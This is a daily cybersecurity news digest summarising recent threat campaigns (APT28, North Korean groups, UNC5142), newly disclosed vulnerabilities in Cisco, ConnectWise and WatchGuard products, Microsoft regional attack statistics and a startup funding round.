Recent cyber activity highlights escalating threats from both state-sponsored and financially motivated actors. Russia-backed APT28 has launched a sophisticated campaign targeting Ukrainian military personnel to deploy BeardShell and Covenant malware. Meanwhile, a North Korea-linked group is conducting a new campaign, “ClickFake Interview,” which delivers OtterCandy, a dual-purpose RAT and information stealer. In parallel, Microsoft reported that the UAE ranked 9th globally and Saudi Arabia 23rd in cyber activity impact, with over 80% of attacks motivated by data theft for financial gain. Read further for more cybersecurity updates from the last 24 hours.
01
APT28, a Russian state-sponsored threat actor, has launched a sophisticated cyberattack targeting Ukrainian military personnel through weaponized Office documents to deliver BeardShell and Covenant malware.
02
A new malware campaign dubbed “ClickFake Interview” by North Korea-linked group WaterPlum’s Cluster B is deploying OtterCandy, which operates as both a RAT and an info-stealer.
03
North Korean hackers have been found using a blockchain-based technique called 'EtherHiding' to deliver malware and facilitate cryptocurrency theft.
04
A TikTok campaign is promoting fake software activation methods that lead to malware installation, tricking users into executing malicious PowerShell commands.
05
UNC5142 is utilizing blockchain smart contracts and compromised WordPress sites to distribute various info-stealing malware, including Atomic and Vidar, targeting both Windows and macOS systems.
06
Microsoft reported that the UAE ranked 9th globally and Saudi Arabia 23rd for cyber activity impact, with most attacks—over 80%—driven by data theft for financial gain, 52% tied to ransomware or extortion, and just 4% to espionage.
07
Hackers have successfully exploited a recently patched vulnerability (CVE-2025-20352) in Cisco networking devices, specifically targeting the SNMP in Cisco IOS and IOS XE. This flaw allows for RCE, primarily affecting Cisco 9400, 9300, and legacy 3750G series devices.
08
ConnectWise has issued a critical security update for its Automate platform after discovering vulnerabilities (CVE-2025-11492 and CVE-2025-11493) that could allow attackers to intercept and tamper with software updates.
09
Researchers have uncovered a critical vulnerability in WatchGuard Fireware OS, identified as CVE-2025-9242, which allows unauthenticated attackers to execute arbitrary code.
10
Conceal, a cybersecurity firm, secured $26 million in a Series B round led by Two Bear Capital, with participation from Allegis Cyber and Gula Tech Adventures.
